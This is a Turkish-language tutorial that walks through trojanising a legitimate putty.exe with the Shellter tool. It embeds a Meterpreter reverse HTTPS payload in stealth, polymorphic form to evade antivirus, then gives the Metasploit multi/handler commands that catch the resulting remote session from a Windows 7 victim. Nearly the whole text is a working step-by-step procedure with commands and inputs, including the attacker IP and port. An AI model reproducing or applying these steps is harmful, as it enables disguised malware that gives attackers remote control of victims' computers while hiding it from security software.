Shellter aracı Kali deposundan indirilebileceği gibi güncel hali web sayfasından da indirilebilir.
https://www.shellterproject.com/download/
İndirilen sıkıştırılmış dosya dışarıya çıkarılır.
cd Desktop
ls
unzip shellter.zip
ls
cd shellter/
ls
shellter.exe adlı dosya çalıştırılabilir hale getirilir.
ls -la
chmod 744 shellter.exe
ls -la
İçerisine kod gömülecek olan yasal uygulama (bu örnek için 32 bitlik putty.exe) shellter dizinine kaydedilir.
Shellter başlatılır. Shellter aracı ilk olarak hangi modda çalışılacağını sormaktadır. Otomatik (Auto) modda zararlı uygulama, son kullanıcı ile fazla etkileşime girmeden otomatik olarak oluşturulur. Manuel (manual) modda ise, zararlı uygulamanın son kullanıcı tarafından özelleştirilmesi beklenir.
wine shellter.exe
Bu örnekte otomatik mod seçilmiştir. Sonraki adımda ise içerisi kod enjekte edilecek uygulama seçilir. Bu seçimlerden sonra içerisine kod gömülecek uygulamanın yedeği otomatik olarak alınır. Windows işletim sistemi ile uyumluluğu ve paketlenme durumu belirtilir.
A
putty.exe
Shellter aracı arka planda PE (Portable Executable) formatı içindeki bazı bilgileri ayarlar ve aynı dizinde DisAsM.dll adlı bir DLL dosyası oluşturulur.
Sonraki adımda, uygulamanın – içerisine kod enjekte edilmeden önceki hali gibi – çalışığ çalışmayacağı sorulmaktadır.
Putty uygulamasının, kod enjekte edildikten sonra, işlevselliğini koruması istendiğinden Stealth Mode etkinleştirilebilir. Sonraki adımda ise, listenenen Payload seçeneklerinden seçim yapılması (L – Listed) veya özel bir Payload belirtilmesi (C – Custom) beklenmektedir.
Y
Bu örnekte listelenen Payload seçeneklerinden “meterpreter_reverse_https” seçilmiştir. Ayrıca ters bağlantı sağlandıktan sonra bağlanılacak IP olarak da Kali’nin IP’si olan 192.168.74.141 girilmiştir. Port olarak da TCP 443. port belirlenmiştir. Girilen bu Payload bilgileri son kullanıcıya listenmektedir.
L
3
192.168.74.141
443
Bu aşamadan sonra arka planda zararlı uygulama otomatik olarak oluşturulmaya başlanmıştır. Payload kodlanıp bind edilir. Oluşturulan zararlı uygulama polimorfik özellik taşıyacaktır. Böylece hedef sistemde karakteristiğini / imzasını değiştirerek AV gibi sistemlerden kaçınılabilecektir.
LoadLibrary ve GetProcAddress fonksiyonları hook edilir.
Gereksiz / Çöp (Junk) kodlar üretilir.
Zararlı kod, belirtilen uygulamaya (putty.exe) enjekte edilir.
Checksum düzeltilir. Zararlı kodun doğru bir şekilde enjekte edilip edilmediği test edilir.
Tüm adımlar başarılı bir şekilde gerçekleşmiş ise, mevcut dizindeki putty.exe uygulamasına zararlı kod enjekte edilmiş olur.
Hazırlanan zararlı uygulama çalıştırıldığında, bir talep oluşacaktır. Bu talebin yakalanması için bir MSF multi-handler oluşturulur ve beklenir.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.74.141
set LPORT 443
set ExitOnSession false
show options
exploit -j -z
Windows 7 istemci bilgisayarda, içerisine kod enjekte edilen uygulama çalıştırıldığında, – zararlı kod Stealth Mod’da hazırlandığı için – normal işlevini yerine getirmektedir.
Bunun yanında Kali bilgisayarda ise, uygulamayı çalıştıran kullanıcı hakları ile Reverse HTTPS Meterpreter bağlantısı yakalanmıştır.
exploit -j -z
sessions
sessions -i 1
sysinfo
Shellter aracı ile hazırlanan ve içerisine kod enjekte edilmiş uygulama, 15 Kasım 2015 tarihinde VirusTotal ile kontrol edildiğinde 1 AV tarafından tespit edildiği görülmektedir.
Kaynak:
Anti-Virus Bypass with Shellter 5.1 on Kali Linux